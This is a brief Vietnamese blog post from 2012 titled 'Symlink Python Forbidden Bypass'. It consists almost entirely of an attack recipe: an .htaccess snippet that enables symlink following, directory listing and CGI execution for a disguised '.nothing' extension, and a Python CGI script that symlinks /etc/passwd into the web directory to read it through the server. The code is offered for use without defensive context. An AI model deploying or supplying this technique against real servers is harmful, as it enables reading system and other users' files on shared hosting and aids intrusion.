Thứ Bảy, 16 tháng 6, 2012

Symlink Python Forbidden Bypass

.htacesss

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .nothing

AddHandler cgi-script .nothing
AddHandler cgi-script .nothing
Forbidden.nothing
#!/usr/bin/python
print "Content-type: text/html\n\n"

import os
filename = "nothing.txt" #dst
linkto = "/etc/passwd" #source
os.symlink(linkto, filename)
Chuyên Mục:
Người đăng: vào lúc

Không có nhận xét nào:

Đăng ký: Đăng Nhận xét (Atom)